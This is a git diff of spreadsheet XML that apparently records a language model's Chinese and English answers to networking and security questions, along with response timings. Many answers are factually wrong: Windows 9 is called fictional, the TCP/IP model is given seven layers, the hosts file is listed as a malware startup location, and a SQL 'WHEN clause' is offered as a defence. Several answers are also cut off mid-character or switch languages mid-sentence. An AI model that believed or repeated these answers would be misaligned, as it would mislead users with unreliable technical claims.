+你也可以使用“network and internet”客户端来查看系统的IP地址。请到“控制面板”中，在左侧导航栏中选择“网络和互联网”选项卡，然后在右侧的“网络和互联网”下拉菜单中选择“网络和互联网客户端”。在这个客户端中，你可以查看系统的IP地址。
+4. 使用第三方工具
+你还可以使用第三方工具来查看系统的IP地址。例如，你可以使用“Hosts”工具来查看系统的IP地址。请到“控制面板”中，在左侧导航栏中选择“系统和安全”选项卡，然后在下拉菜单中选择“系统”。在这个选项卡上，你可以查看系统的IP地址。
+综上所述，你可以使用控制面板、“ipconfig”命令、“network and internet”客户端和第三方工具来查看Windows系统的IP地址。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D105" t="n">
-        <v>5.948945045471191</v>
+        <v>15.498459815979</v>
       </c>
     </row>
     <row r="106">
@@ -2920,15 +3640,22 @@
       <c r="C106" t="inlineStr">
         <is>
           <t>？
-Windows系统可以作为服务器系统，但是需要满足一些系统要求。以下是一些需要注意的事项：
-1. 系统需要具备足够的资源，包括硬件资源（如处理器、内存、磁盘空间）和软件资源（如操作系统、服务器软件）。
-2. 系统需要具备完善的安全措施，包括 firewalls、防病毒软件、权限管理等。
-3. 系统需要具备可靠的备份和恢复机制，以确保数据的安全和可用性。
-4. 系统需要具备可读性和可�����</t>
+Yes, Windows can be used as a server system. Windows Server is a version of Windows that is specifically designed for use as a server operating system, and it includes many features that make it well-suited for this role. Some of the key features of Windows Server include:
+1. Server Role: Windows Server includes a server role that allows you to easily install and manage server applications and services, such as DNS, DHCP, and IIS.
+2. Remote Access: Windows Server includes tools for remote access, such as Remote Desktop and Remote Access, which allow users to access and control their Windows servers from a remote location.
+3. Networking: Windows Server includes a number of networking features, such as DNS, DHCP, and HTTP/HTTPS server, that are essential for a server system.
+4. Security: Windows Server includes a number of security features, such as User Account Control (UAC), Windows Defender, and Windows Firewall, that help protect your server from unauthorized access and malware.
+5. Scalability: Windows Server is highly scalable, allowing you to easily add more servers to your network as your needs grow.
+6. Active Directory: Windows Server includes Active Directory, which is a powerful directory service that allows you to manage your users, groups, and other network resources.
+7. PowerShell: Windows Server includes PowerShell, a powerful scripting language that allows you to automate many tasks and customize your server configuration.
+8. Hyper-V: Windows Server includes Hyper-V, a hypervisor that allows you to create and manage virtual machines (VMs) on your server.
+9. Failover Clustering: Windows Server includes failover clustering, which allows you to create a cluster of servers that can automatically take over the workload of another server in the event of a failure.
+10. Application Server: Windows Server includes an application server that allows you to host and manage web applications.
+Overall, Windows Server is a powerful and flexible operating system that can be used to build a wide range of server systems, from small to large, depending on your needs.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D106" t="n">
-        <v>5.952571153640747</v>
+        <v>11.69133996963501</v>
       </c>
     </row>
     <row r="107">
@@ -2942,14 +3669,15 @@
       </c>
       <c r="C107" t="inlineStr">
         <is>
-          <t>？ 在下面的文章中，我们将详细介绍Windows 9的特点，以及它如何对 Windows 8 的升级做出贡献。
-Windows 9 is the next major release of the Windows operating system, designed to provide a more personalized and intuitive computing experience. It is the successor to Windows 8, and is expected to be released in late 2015 or early 2016.
-One of the key features of Windows 9 is its improved Start menu, which will provide users with a more traditional and user-friendly interface. The Start menu will feature a grid of tiles that can be customized to display the applications and files that are most important to the user. Additionally, Windows 9 will include a new feature called "Sets," which will allow users to group their applications and windows into different virtual desktops.
-Another major improvement in Windows 9 is its support for desktop apps. Unlike Windows 8, which is primarily designed for touch-based interfaces, Windows 9 will allow users to run desktop applications alongside</t>
+          <t>？  What is Windows 9?
+Windows 9 is a fictional operating system that has been the subject of numerous rumors and speculation over the years. There have been several instances where a new version of Windows, referred to as Windows 9, was announced or leaked, only to be later revealed to be a hoax or a misidentification.
+The first major instance of Windows 9 rumors emerged in the early 2000s, when Microsoft was rumored to be working on a new version of Windows codenamed "Windows 9." At the time, Microsoft was expected to release Windows 9 in 2004, but the project was later canceled and the company instead focused on developing Windows Vista.
+Since then, there have been numerous other instances of Windows 9 rumors, including leaks and speculation about upcoming versions of Windows. However, none of these have been officially confirmed by Microsoft, and the company has consistently maintained that there are no plans to release a new version of Windows 9.
+In summary, Windows 9 is a fictional operating system that has been the subject of numerous rumors and speculation over the years, but there is no official confirmation from Microsoft that such a version exists or is in development.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D107" t="n">
-        <v>5.932950973510742</v>
+        <v>7.006731271743774</v>
       </c>
     </row>
     <row r="108">
@@ -2964,18 +3692,21 @@
       <c r="C108" t="inlineStr">
         <is>
           <t>？  
- woodworm virus commonly creates startup items in which parts of the Windows system?
-The woodworm virus is a type of malware that can create startup items in various parts of the Windows system. Some common locations where the woodworm virus may create startup items include:
-1. Registry: The woodworm virus can modify the Windows Registry to create startup keys and values that launch the virus when the system boots up.
-2. Startup folder: The virus can create a folder in the Startup folder of the system, which automatically runs the virus when the system starts.
-3. Task Scheduler: The woodworm virus can create tasks in the Task Scheduler to run the virus at startup.
-4. AutoRun folders: The virus can create folders in the AutoRun folders of the system, which launch the virus when the system boots up.
-5. System files: In some cases, the woodworm virus may modify system files, such as the configuration files of the Windows shell, to create startup items.
-It's important to note that the woodworm virus can also create other types of startup items, such as scheduled tasks, keyboard shortcuts, and system</t>
+木马病毒通常在Windows系统中哪些地方创建启动项？
+木马病毒通常会在Windows系统中创建启动项以便在系统启动时执行恶意代码。以下是常见的启动项目：
+1. 系统启动条件：木马病毒可以在系统启动时执行恶意代码，通常会在系统启动条件下执行，例如在 boot.ini 文件中添加一个 line。
+2. 注册表：木马病毒可以通过编辑注册表来创建启动项，例如在 HKLM\Run 和 HKLM\RunOnce 下添加一个值。
+3. 启动文件：木马病毒可以在启动文件中添加一个 line，例如在 autorun.inf 文件中添加一个 line。
+4. 隐藏文件：木马病毒可以在隐藏文件中添加一个 line，例如在 C:\Windows\System32\drivers\hosts 文件中添加一个 line。
+5. 网络协议：木马病毒可以在网络协议中添加一个规则，例如在 TCP/UDP 规则下添加一个规则。
+6. 虚拟加密：木马病毒可以在虚拟加密中添加一个规则，例如在虚拟加密规则下添加一个规则。
+7. 注册表键：木马病毒可以在注册表中添加一个键，例如在 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下添加一个键。
+8. 启动缓冲区：木马病毒可以在启动缓冲区中添加一个值，例如在 C:\Windows\System32\drivers\hosts 文件中添加一个值。
+需要注意的是，这些启动项的名称和路径可能会不同，因此需要根据具体情况进行定制。同时，防止木马病毒创建启动项的方法也有很多，例如使用 antivirus 软件检测和 removemarcos 等工具。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D108" t="n">
-        <v>5.946292877197266</v>
+        <v>18.9875967502594</v>
       </c>
     </row>
     <row r="109">
@@ -2990,15 +3721,19 @@
       <c r="C109" t="inlineStr">
         <is>
           <t>？
-TCP和UDP是两种常用的网络协议，它们之间有许多区别。以下是一些主要的区别：
-1. 确认和协议：TCP是一种确认和协议，它在传输数据时会发送确认包，以确保数据的传输正确性。而UDP是一种无确认和协议，它不会发送确认包，因此它的传输速度更快。
-2. 错误检测和自己修复：TCP可以检测和自己修复错误，而UDP不能。
-3. 连接建立和维护：TCP需要建立连接并维护连接，而UDP不需要建立连接，直接将数据传输。
-4</t>
+TCP和UDP是两种常用的网络协议，它们之间有一些主要区别，下面是它们的主要区别：
+1. 确认包：TCP是一种确认包的协议，它会在发送数据包时进行确认，如果数据包在传输过程中不可靠，会重新发送数据包。UDP则不进行确认，只是直接发送数据包。
+2. 错误检测：TCP会在接收数据包时检测数据包的错误，如果发现错误，会返回错误的数据包。UDP不进行错误检测，直接将数据包传输给应用层。
+3. Multicast：TCP不支持Multicast，UDP支持Multicast。
+4. 可靠性：TCP的确认包机制提供了一定的可靠性，可以确保数据的传输，而UDP则不具备这个功能。
+5. 应用层：TCP主要用于Application层的数据传输，而UDP主要用于Transport层的数据传输。
+6. 报文头：TCP的报文头包含了各种信息，如源和目标端口号、Sequence Number、Acknowledgement Number等，而UDP的报文头只包含端口号和数据包的偏移量。
+7. 扩展：TCP具有较强的扩展性，可以让应用层添加新的功能，而UDP的扩展性较弱。
+总的来说，TCP是一种更可靠、更高层次的协议，适用于需要高度可靠性和可靠性的应用，如FSF、FTP、 Telnet等；UDP是一种更快速、更低层次的协议，适用于需要高速传输大量数据的应用，如音频、视频等。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D109" t="n">
-        <v>5.934319734573364</v>
+        <v>16.09382581710815</v>
       </c>
     </row>
     <row r="110">
@@ -3013,11 +3748,20 @@
       <c r="C110" t="inlineStr">
         <is>
           <t>？
-FTP是一种上下文跨越协調协议，它属于TCP/IP模型的Application层。在TCP/IP模型中，Application层是对于实时传输应用的，包括FTP、SMTP、DNS等。&lt;/s&gt;</t>
+FTP是一种文件传输协议，属于TCP/IP模型的应用层。具体地，FTP位于TCP/IP模型中的应用层，紧随 TCP 协议之后。
+TCP/IP模型中的各层分别是：
+1. 网络层 (Network Layer)：包括 IP 协议和 ICMP 协议。
+2. 传输层 (Transport Layer)：包括 TCP 协议和 UDP 协议。
+3. 应用层 (Application Layer)：包括 FTP、Telnet、HTTP、SMTP 等协议。
+4. 会话层 (Session Layer)：包括 SSH 协议。
+5.  presentaion层 (Presentation Layer)：包括 SSL/TLS 协议。
+6. 数据驱动层 (Data Link Layer)：包括 Ethernet、PPP 等网络协议。
+7. 物理层 (Physical Layer)：包括电缆、WIFI 等物理层网络协议。
+因此，FTP属于TCP/IP模型中的应用层。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D110" t="n">
-        <v>1.947579383850098</v>
+        <v>9.932053327560425</v>
       </c>
     </row>
     <row r="111">
@@ -3032,13 +3776,13 @@
       <c r="C111" t="inlineStr">
         <is>
           <t>？
-DNS是明文的，不是加密的。 DNS 是Domain Name System，它是互联网上的域名解析系统。 DNS 将域名译为 IP 地址，这个过程是明文的，也就是说，它不使用加密技术来传输域名和 IP 地址。
-当你访问一个域名时，DNS 服务器会尝试解析域名，并将它译为相应的 IP 地址。这个过程是明文的，因为它不需要使用加密技术。
-但是，一些 DNS 服务器可能会使用加密技术来保护用户的隐私，例如 DNS over HTTPS（DOH）或 DNS over TLS（DOT）。这些技术可以加密 DNS 数据，以��</t>
+DNS是明文的，它是一种分布式、查询式的域名系统。DNS服务器将域名解析成相应的 IP 地址，然后将这个 IP 地址发送给应用程序。因此，DNS 是明文的。
+然而，DNS 也可以使用加密技术来保护域名解析过程中的数据。这种加密技术称为 DNSSEC，它可以防止 DNS 中的数据被恶意攻击或修改。但是，DNSSEC 并不是一种默认的 DNS 功能，需要在 DNS 服务器和客户端之间建立 специаль 的体系。
+总之，DNS 是明文的，但是可以使用加密技术来保护它的安全性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D111" t="n">
-        <v>5.91628623008728</v>
+        <v>6.508389472961426</v>
       </c>
     </row>
     <row r="112">
@@ -3053,19 +3797,27 @@
       <c r="C112" t="inlineStr">
         <is>
           <t>？
-HTTP请求头是一个可选的字符串，用于在HTTP协议中包含附加信息。下面是HTTP请求头的常见字段：
-1. `Accept`: 指定客户端能够处理的响应数据格式。
-2. `Accept-Language`: 指定客户端的语言设置。
-3. `Accept-Encoding`: 指定客户端能够处理的压缩编码方式。
-4. `Authorization`: 指定身份验证信息，用于访问 защиited 资源。
-5. `Content-Type`: 指定请求体的数据类型。
-6. `Cookie`: 指定客户端的 cookie 信息。
-7. `Host`: 指定客户端要访问的域名。
-8. `If-Modified-Since`: 指定</t>
+HTTP请求头有以下几个字段：
+1. `Host`: 指定请求的主机（Host）和端口（Port）。
+2. `User-Agent`: 指定客户端的软件名称和版本号。
+3. `Accept`: 指定客户端可以接受的响应类型（Content-Type）。
+4. `Accept-Language`: 指定客户端的语言地区。
+5. `Accept-Encoding`: 指定客户端的数据编码方式。
+6. `Authorization`: 指定凭据（Authorization）用于请求访问保护的资源。
+7. `Cookie`: 指定客户端已经接收的Cookies（Cookie）。
+8. `Content-Type`: 指定请求体的类型（Content-Type）。
+9. `Content-Length`: 指定请求体的大小（Content-Length）。
+10. `Connection`: 指定客户端和服务器之间的连接方式（Connection）。
+11. `Proxy-Authorization`: 指定客户端是否需要代理服务器的凭据（Proxy-Authorization）。
+12. `If-Modified-Since`: 指定客户端是否需要响应已经修改的资源（If-Modified-Since）。
+13. `If-None-Match`: 指定客户端是否需要响应不存在的资源（If-None-Match）。
+14. `Range`: 指定客户端需要读取的资源的范围（Range）。
+15. `TE`: 指定响应的类型（TE）。
+这些字段可以根据实际情况进行调整，但一般来说，这些字段都是必须的。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D112" t="n">
-        <v>5.914541006088257</v>
+        <v>13.30764222145081</v>
       </c>
     </row>
     <row r="113">
@@ -3080,19 +3832,35 @@
       <c r="C113" t="inlineStr">
         <is>
           <t>？
-HTTP响应码有几种，分表的含义是什么？HTTP响应码是指服务器端返回的一个数字代码，用于告知客户端发送的请求是否成功。HTTP响应码的含义如下：
-1xx Informational - 100-199
-------------------------
-* 100 Continue: 客户端继续发送请求，服务器继续评估。
-* 101 Switching Protocols: 服务器继续使用HTTP/1.1协议，客户端需要使用HTTP/1.1协议。
-2xx Success - 200-299
-------------------------
-* 200 OK: 客户端的请求成功，服务器返回请求数据。
-* 20</t>
+HTTP 响应码是指服务器端返回客户端的一个数字代码，用于指示客户端是否 erfolgreich 请求。HTTP 响应码分为以下几种：
+1xx 状态码：表示请求是成功的，但没有任何数据返回。
+* 100 Continue：表示客户端的请求符合服务器端的预期，但服务器端还没有处理请求。
+* 101 Switching Protocols：表示服务器端升级到新的协议。
+2xx 状态码：表示请求是成功的，并且服务器端返回了数据。
+* 200 OK：表示请求是成功的，并且服务器端返回了请求的数据。
+* 201 Created：表示服务器端创建了新的资源，并返回了资源的 Location Header。
+* 202 Accepted：表示服务器端接受了请求，但服务器端的资源 Currently Unavailable 或预约尚未实现。
+* 203 Non-Authoritative Information：表示服务器端返回了另一个资源，该资源不是客户端请求的资源。
+* 204 No Content：表示请求是成功的，但服务器端没有返回任何数据。
+* 205 Reset Content：表示请求是成功的，但服务器端返回了新的数据，用于替代原始数据。
+3xx 状态码：表示请求需要重新进行，或者客户端需要重新发送请求。
+* 300 Multiple Choices：表示服务器端返回了多个可用资源，客户端需要选择哪一个资源。
+* 301 Moved Permanently：表示服务器端搬 trasfer 了资源，客户端需要重新获取资源。
+* 302 Found：表示服务器端搬 transfer 了资源，但客户端可以继续使用原始资源。
+* 303 See Other：表示服务器端返回了其他资源，客户端需要重新获取资源。
+* 304 Not Modified：表示客户端的请求的资源未变，服务器端没有返回任何数据。
+4xx 状态码：表示客户端的请求有误，或者客户端没有执行准备好的请求。
+* 400 Bad Request：表示客户端的请求无效或错误。
+* 401 Unauthorized：表示客户端没有授权，或者客户端的授权已经过期。
+* 402 Payment Required：表示客户端的请求需要支付费用。
+* 403 Forbidden：表示客户端没有权限访问资源。
+* 404 Not Found：表示客户端的请求没有找到相应的资源。
+* 405 Method Not Allowed：表示客户端的请求使用的方法不允许。
+5xx 状态码：表示服务器端的</t>
         </is>
       </c>
       <c r="D113" t="n">
-        <v>5.930315017700195</v>
+        <v>26.58223152160645</v>
       </c>
     </row>
     <row r="114">
@@ -3107,14 +3875,18 @@
       <c r="C114" t="inlineStr">
         <is>
           <t>？
-HTTPS是Hypertext Transfer Protocol Secure的简写，是一种安全协议，可以使互联网上的通信更加安全和透明。它通过SSL/TLS协议实现了数据加密和身份验证，从而避免攻击者 intercept 和篡改数据。
-HTTPS通常用于安全访问敏捷、购物、银行、保健等网站，也可以用于建立安全的内部网络通信。它可以保证数据的完整性和integrity，同时也可以确保用户的隐私和安全。
-具体来说，HTTPS的主要特点包括：
-1. 数据加密：使用SSL/TLS协议对数据进行</t>
+HTTPS（Hypertext Transfer Protocol Secure）是HTTP的安全升级版，它使用SSL（Secure Sockets Layer）或TLS（Transport Layer Security）协议来保护网络上的数据交互。HTTPS通过加密请求和响应数据，以防止恶意攻击者 intercept 或 tamper 电子邮件、个人信息等，同时还可以确保数据的身份验证和数据Integrity。
+HTTPS的主要特点包括：
+1. 加密：HTTPS使用加密技术来保护请求和响应数据，防止恶意攻击者 intercept 或 tamper 数据。
+2. 身份验证：HTTPS使用证书来 authenticate 服务器的身份，防止恶意攻击者 masquerading 成合法的服务器。
+3. 数据Integrity：HTTPS使用加密技术来保护数据的完整性和integrity，防止恶意攻击者 modify 或 tamper 数据。
+4. 权利证：HTTPS使用证书来签名请求和响应数据，防止恶意攻击者 modify 或 tamper 数据。
+5. 安全协议：HTTPS使用安全协议来保护数据的交互，防止恶意攻击者 interfere 或 tamper 数据。
+总之，HTTPS是HTTP的安全升级版，可以保护网络上的数据交互，防止恶意攻击者 intercept 或 tamper 数据，同时还可以确保数据的身份验证和数据Integrity。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D114" t="n">
-        <v>5.911540985107422</v>
+        <v>14.03022599220276</v>
       </c>
     </row>
     <row r="115">
@@ -3129,14 +3901,18 @@
       <c r="C115" t="inlineStr">
         <is>
           <t>？
-VPN协议是指在VPN连接中使用的协议，它们确定了如何 encrypt 和  переда交换加密的数据。以下是常见的VPN协议：
-1. OpenVPN：OpenVPN 是一种开源的 VPN 协议，它使用 TLS 加密和 SSL 加密，可以跨多种网络连接，如 TCP、UDP 和 UNIX 隧道。
-2. L2TP/IPSec：L2TP/IPSec 是一种扩展的 VPN 协议，它使用点对点（L2TP）和政策认证（IPSec）加密。L2TP 用于建立虚拟连接，而 IPSec 用于加密数据。
-3. PPTP：PPTP（Point-to-Point Tunneling Protocol）是一种</t>
+VPN（虚拟专用网络）是一种技术，允许用户在互联网上进行安全和透明的通信。以下是常见的VPN协议：
+1. OpenVPN：OpenVPN 是一个开源的 VPN 协议，具有较高的安全性和可靠性。它使用 SSL/TLS 协议进行加密和证明，并可以在多种操作系统上使用。
+2. L2TP/IPSec：L2TP/IPSec 是一种基于Layer 2（传输层）的VPN协议，它使用的是加密和证明的IPSec协议。L2TP/IPSec 具有高度的安全性和可靠性，但需要更多的配置和管理。
+3. PPTP：Point-to-Point Tunneling Protocol（点对点隧道协议）是一种远程访问VPN协议，它使用的是MPPE（Multiprotocol Password Encryption）协议进行加密。PPTP 具有较低的配置和管理复杂度，但安全性较低。
+4. IKEv2：Internet Key Exchange version 2（互联网键exchange2）是一种安全的VPN协议，它使用的是可靠的symmetric encryption和非对称加密。IKEv2 具有较高的安全性和可靠性，但需要更多的配置和管理。
+5. SSH（Secure Shell）：SSH 是一种安全的Remote Access协议，它可以在多种操作系统上使用，但不是一种专门的VPN协议。SSH 具有较高的安全性和可靠性，但需要更多的配置和管理。
+6. SSL/TLS：Secure Sockets Layer/Transport Layer Security（安全сокет层/传输层安全）是一种安全的协议，它可以在多种操作系统上使用，但不是一种专门的VPN协议。SSL/TLS 具有较高的安全性和可靠性，但需要更多的配置和管理。
+这些协议都有各自的优缺点和应用场景， selects the most appropriate VPN protocol for your needs.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D115" t="n">
-        <v>5.92167592048645</v>
+        <v>19.23310112953186</v>
       </c>
     </row>
     <row r="116">
@@ -3151,14 +3927,22 @@
       <c r="C116" t="inlineStr">
         <is>
           <t>？
-Shadowsocks是一个开源的跨平台虚拟专用网络（VPN）实现，它是Shadowsocks-Rocket和Shadowsocks-X之间的抽象。Shadowsocks-Rocket是一个基于LibreSSL（前称OpenSSL）的跨平台VPN实现，它支持多种协议，如SOCKS4、SOCKS5、TCP、UDP等。Shadowsocks-X是一个基于TCP掩蔽协议的VPN实现，它可以在TCP协议的基础上实现会话Encryption和掩蔽。
-Shadowsocks的主要特点包括：
-1. 跨平台支持：Shadowsocks支持多种操作系统，包括Windows、Linux、MacOS等。
-2. 多种����</t>
+Shadowsocks是一个开源的跨平台、安全的VPN工具，可以在多种操作系统上使用，包括Linux、Mac OS、Windows等。它的主要特点是具有以下几个优点：
+1. 安全性：Shadowsocks使用安全的 encryption algorithm，可以减少攻击者的阻挡和监听。
+2. 隐蔽性：Shadowsocks可以隐藏用户的网络活动，使其difficult to detect和 block。
+3. 多态性：Shadowsocks支持多种VPN protocols，可以根据不同的情况选择最适合的协议。
+4. 跨平台支持：Shadowsocks可以在多种操作系统上使用，包括Linux、Mac OS、Windows等。
+5. 开源：Shadowsocks是开源的，可以免费使用和修改。
+Shadowsocks的主要应用场景包括：
+1. 隐蔽网络活动：Shadowsocks可以隐藏用户的网络活动，保护用户的隐私和安全。
+2. 跨国连接：Shadowsocks可以跨国连接，帮助用户访问境外的网站和服务。
+3. 避免网络审查：Shadowsocks可以避免国家的网络审查和监控。
+4. 安全上网：Shadowsocks可以提供一个安全的网络连接，防止恶意软件和攻击者攻击用户的计算机。
+总之，Shadowsocks是一个安全、隐蔽、多态的VPN工具，可以帮助用户隐藏网络活动，保护隐私和安全，并且可以在多种操作系统上使用。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D116" t="n">
-        <v>5.924892425537109</v>
+        <v>15.33157229423523</v>
       </c>
     </row>
     <row r="117">
@@ -3172,15 +3956,22 @@
       </c>
       <c r="C117" t="inlineStr">
         <is>
-          <t>？  
-RDP（Remote Desktop Protocol）是一种协议，它允许一个计算机 remotely（远程）连接到另一个计算机，并在其上运行应用程序和操作系统。RDP是一种远程存取协议，它使得用户可以从一个计算机上访问另一个计算机的屏幕、键盘和鼠标，从而在远程计算机上运行应用程序和操作系统。
-RDP允许用户通过互联网或者其他网络连接到远程计算机，并在远程计算机上执行任务，例如：
-* 访问和操作远程计算机上的文件和应用程序
-* 访问和</t>
+          <t>？ 
+RDP stands for Remote Desktop Protocol. It is a communication protocol that allows users to remotely access and control another computer over a network connection. RDP is commonly used to remotely access and control a computer running the Windows operating system, but it can also be used to access and control other types of computers and devices.
+RDP is a widely used protocol, and it is supported by many different operating systems and platforms, including Windows, macOS, Linux, and mobile devices. RDP allows users to connect to a remote computer using a variety of clients, including the built-in Remote Desktop client in Windows, third-party clients like TeamViewer or LogMeIn, or even mobile apps like Remote Desktop for iOS or Android.
+Once a user has connected to a remote computer using RDP, they can use the remote desktop to interact with the computer's desktop and applications as if they were sitting in front of it. This allows users to access and control the remote computer's files, applications, and hardware remotely, which can be useful for a variety of purposes, such as working remotely, providing technical support, or accessing a computer for maintenance or troubleshooting.
+RDP is a powerful and versatile protocol that offers many features and benefits, including:
+* Remote access to a computer's desktop and applications
+* Full keyboard and mouse control over the remote computer
+* Ability to transfer files and data between the remote and local computers
+* Support for multiple monitors and resolutions
+* Encryption and security features to protect the remote connection
+* Integration with other Microsoft technologies, such as Active Directory and Azure
+Overall, RDP is an important protocol that enables users to remotely access and control computers over a network connection, making it a valuable tool for a wide range of applications and use cases.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D117" t="n">
-        <v>5.93070125579834</v>
+        <v>10.22894668579102</v>
       </c>
     </row>
     <row r="118">
@@ -3195,13 +3986,22 @@
       <c r="C118" t="inlineStr">
         <is>
           <t>？
-在开发中，避免SQL注入漏洞非常重要，因为它可能会导致敏感数据泄露和安全漏洞。以下是一些有用的建议，可以帮助您避免SQL注入漏洞：
-1. 使用parameterized queries：使用parameterized queries可以避免使用直接在SQL语句中传递用户提供的数据。这样可以避免SQL注入漏洞，因为 parameterezed queries不会将用户提供的数据直接传递到SQL语句中。
-2. 避免使用rawQuery(): 避免使用rawQuery()方法，因为它会将用户提供的数据直接传递到SQL语句中，容</t>
+SQL注入是一种常见的web应用程序漏洞，它可以让攻击者在web应用程序中执行任意的SQL语句，从而导致数据丢失、安全漏洞和威胁。以下是一些有效的方法来避免SQL注入漏洞在开发中：
+1. 使用 Parameterized Query：使用Parameterized Query可以避免 directly injecting user input into the SQL query. By using parameterized queries, you can bind the user input to a parameter, which will be passed to the database as a parameter, rather than being incorporated directly into the SQL query.
+2. 使用Prepared Statements：Prepared statements are a type of stored procedure that can be used to execute a SQL query. By using prepared statements, you can avoid SQL injection by providing a pre-defined SQL query, rather than constructing the query dynamically.
+3. 避免使用user input directly into SQL queries： avoid using user input directly into SQL queries. Instead, use parameterized queries or stored procedures to execute the SQL query.
+4. 使用WHEN clause：use the WHEN clause to validate user input before inserting it into the SQL query. This can help prevent SQL injection attacks by ensuring that only valid input is used in the query.
+5. 使用Limitations on input：limit the input that can be used in the SQL query. For example, you can limit the length of the input or the types of characters that can be used in the input.
+6. 使用Output escaping：use output escaping to escape any special characters in the output. This can help prevent SQL injection attacks by ensuring that any special characters in the output are properly escaped.
+7. 使用security frameworks：use security frameworks such as OWASP ESAPI or Spring Security to help protect against SQL injection attacks. These frameworks provide a range of features and tools to help protect against SQL injection and other security threats.
+8. 使用Automated testing：use automated testing to test your application for SQL injection vulnerabilities. This can help identify any vulnerabilities and allow you to fix them before they can be exploited by an attacker.
+9. 使用Web application firewalls：use web application firewalls (WAFs) to protect your application from SQL injection attacks. WAFs can help detect and prevent SQL injection attacks by filtering incoming traffic and blocking any suspicious activity.
+10. 使用Regular expression validation：use regular expression validation to validate user input before inserting it into the SQL query. This can help prevent SQL injection attacks by ensuring that only valid input is used in the query.
+By following these tips, you can help protect your web application from SQL injection attacks and ensure that your data remains secure.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D118" t="n">
-        <v>5.930140495300293</v>
+        <v>16.79712128639221</v>
       </c>
     </row>
     <row r="119">
@@ -3216,13 +4016,22 @@
       <c r="C119" t="inlineStr">
         <is>
           <t>？
-越权漏洞是指在开发过程中，某些人或组织可能会在代码中添加或修改代码，导致整个系统中的漏洞和安全问题。为了避免越权漏洞，可以从以下几个方面进行保障：
-1. 强制实施代码质量标准：在开发过程中，需要强制实施一系列的代码质量标准，例如，使用注释、命名规范、类型检查等，以确保代码的可读性和可维护性。
-2. 增强代码访问权限：通过设置代码访问权限，使得每个人或组织只能��</t>
+在开发中，避免越权漏洞是非常重要的。越权漏洞是指在程序代码中，某个功能或数据被访问或修改了，导致程序运行时出现异常或泄露情况。以下是避免越权漏洞的一些建议：
+1. 使用权限管理：在开发中，使用权限管理是非常重要的。通过限制每个用户或角色的访问权限，可以避免越权漏洞。例如，只允许特定角色访问特定的数据或功能。
+2. 验证用户input：在开发中，需要对用户输入进行严格验证，避免越权漏洞。例如，不要直接使用用户输入来访问数据库或访问其他功能。
+3. 使用安全编程技术：使用安全编程技术，例如，使用SQL注入防御和 cross-site scripting（XSS）防御等。
+4. 采用Role-Based Access Control（RBAC）：RBAC是一种权限管理技术，可以让开发人员根据用户的角色来决定访问权限。
+5. 使用权限模型：使用权限模型，例如，使用ACL（访问控制列表）来管理权限。
+6. 避免使用hardcoded权限：避免在程序代码中使用硬编码的权限，因为这可能会导致越权漏洞。
+7. 使用权限检查：在程序运行时，使用权限检查来验证用户的权限，避免越权漏洞。
+8. 采用权限验证：采用权限验证，例如，使用权限验证模块来验证用户的权限。
+9. 避免使用default权限：避免在程序代码中使用默认权限，因为这可能会导致越权漏洞。
+10. 通过权限审核：通过权限审核来确保权限的有效性，避免越权漏洞。
+总之，避免越权漏洞需要在开发中严格遵循权限管理原则，使用安全编程技术和权限管理工具，并通过权限审核和权限验证来确保权限的有效性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D119" t="n">
-        <v>5.947397947311401</v>
+        <v>22.82029390335083</v>
       </c>
     </row>
     <row r="120">
@@ -3237,13 +4046,20 @@
       <c r="C120" t="inlineStr">
         <is>
           <t>？
-在开发中，溢出漏洞是一种常见的安全漏洞，可能会导致数据泄露或者受到恶意攻击。以下是一些避免溢出漏洞的方法：
-1. 使用验证和检查：在开发过程中，应该对数据进行验证和检查，以确保它们是正确的和完整的。这可以包括数据验证、input validation、parameter validation等方法。
-2. 使用类型检查：使用类型检查可以防止溢出漏洞，例如，在数据存储时，使用适当的类型检查可以防止将错误的数据存储到数据库中</t>
+在开发中，溢出漏洞是一种常见的安全漏洞，可能会导致数据泄露或者远程执行代码。以下是一些避免溢出漏洞的方法：
+1.  validation 和检查：在数据 Binding 时，务必对数据进行正确的 Validation 和检查。检查数据是否符合预期的格式和范围，并执行适当的操作，如抛出异常或终止循环，以防止数据泄露。
+2. 使用授权：在访问数据时，务必使用授权机制，如访问控制列表（ACL）或授权 Token。这样可以防止非法访问数据，从而避免溢出漏洞。
+3. 使用静态分配：在数据 Binding 时，使用静态分配的方式可以避免溢出漏洞。通过在数据 Binding 时使用静态分配的方式，可以确保数据的访问权限是稳定的，从而避免溢出漏洞。
+4. 使用排除机制：在数据 Binding 时，可以使用排除机制，如防火墙或者排除规则，来避免溢出漏洞。这样可以确保数据仅有合法的访问者可以访问。
+5. 使用拦截器：在数据 Binding 时，可以使用拦截器，如防火墙或者拦截器，来避免溢出漏洞。这样可以确保数据仅有合法的访问者可以访问。
+6. 使用最佳 Practice：在数据 Binding 时，务必遵守最佳 Practice，如验证数据的范围和格式，并遵循安全标准和建议。这样可以确保数据的安全性和可靠性。
+7. 使用针对的机制：在数据 Binding 时，可以使用针对的机制，如针对的数据库接口或者针对的分布式系统，来避免溢出漏洞。这样可以确保数据仅有合法的访问者可以访问。
+8. 使用安全框架：在数据 Binding 时，可以使用安全框架，如Spring Security 或者 OWASP，来避免溢出漏洞。这样可以确保数据的安全性和可靠性。
+总之，避免溢出漏洞需要在数据 Binding 时遵循最佳 Practice，使用适当的机制和措施，并在需要时使用安全框架和拦截器等工具。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D120" t="n">
-        <v>5.968288421630859</v>
+        <v>24.43250584602356</v>
       </c>
     </row>
     <row r="121">
@@ -3258,15 +4074,33 @@
       <c r="C121" t="inlineStr">
         <is>
           <t>？
-XSS（Cross-Site Scripting）是一种常见的攻击方式，可以使攻击者在用户的浏览器中执行任何代码。以下是一些避免XSS攻击的方法：
